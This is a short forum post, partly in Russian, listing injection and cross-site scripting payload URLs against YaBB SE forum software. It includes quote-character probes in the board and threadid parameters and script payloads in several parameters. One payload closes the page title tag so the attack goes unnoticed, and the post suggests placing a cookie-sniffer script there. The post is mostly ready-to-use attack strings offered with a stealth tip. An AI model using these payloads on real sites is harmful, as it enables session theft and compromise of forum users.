YaBB SE http://site/forum/index.php?board=' http://site/forum/index.php?board=1;action=display;threadid=' http://site/forum<script>alert()</script> http://site/forumindex.php?board=1;action=icqpager;UIN=<script>alert()</script> http://site/forumindex.php?board=1;action=post;threadid=1;quote=2;title=net</title><script>alert("hacked%20by")</script> (меняем заголовок страницы на "net" и закрывает тэг заголовка. так мы не светимся. а дальше скрипт для сниффера - как всегда) Если баги не свежие, вы ребятки не кидайтесь помидорами, я не проверял багтраки... лянота =) да и модем не позволяет =)
